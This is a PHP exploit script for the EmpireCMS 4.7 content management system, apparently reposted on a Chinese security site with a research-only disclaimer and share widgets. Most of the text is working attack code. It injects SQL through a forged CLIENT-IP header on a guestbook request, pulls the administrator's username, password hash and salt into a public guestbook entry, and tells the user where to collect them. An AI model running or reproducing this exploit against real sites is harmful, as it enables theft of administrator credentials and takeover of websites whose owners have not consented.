<?php print_r(" +------------------------------------------------------------------+ Exploit For EmpireCMS47 Just work as php>=5&mysql>=4.1 BY t00ls.net +------------------------------------------------------------------+ "); if ($argc<3) { echo "Usage: php ".$argv[0]." host path /n"; echo "host: target server /n"; echo "path: path to EmpireCMS47/n"; echo "Example:/r/n"; echo "php ".$argv[0]." localhost //n"; die; } $host=$argv[1]; $path=$argv[2]; $data = "name=11ttt&email=111&call=&lytext=1111&enews=AddGbook"; $cmd = "aaaaaaaa',0,1,''),('t00lsxxxx','t00lsxxxxx','','2008-05-28 15:44:17',(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),'',1,'1111',0,0,'')/*"; $message = "POST ".$path."/e/enews/index.php"." HTTP/1.1/r/n"; $message .= "Referer: http://".$host.$path."/e/tool/gbook/?bid=1/r/n"; $message .= "Accept-Language: zh-cn/r/n"; $message .= "Content-Type: application/x-www-form-urlencoded/r/n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)/r/n"; $message .= "CLIENT-IP: $cmd/r/n"; $message .= "Host: $host/r/n"; $message .= "Content-Length: ".strlen($data)."/r/n"; $message .= "Cookie: ecmsgbookbid=1;/r/n"; $message .= "Connection: Close/r/n"; $message .= "/r/n"; $message .=$data; $ock=fsockopen($host,80); if (!$ock) { echo 'No response from '.$host; die; } echo "[+]connected to the site!/r/n"; echo "[+]sending data now……/r/n"; fputs($ock,$message); @$resp =''; while ($ock && !feof($ock)) $resp .= fread($ock, 1024); echo $resp; echo "[+]done!/r/n"; echo "[+]go to http://$host$path/e/tool/gbook/?bid=1 see the hash,good luck" ?>
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论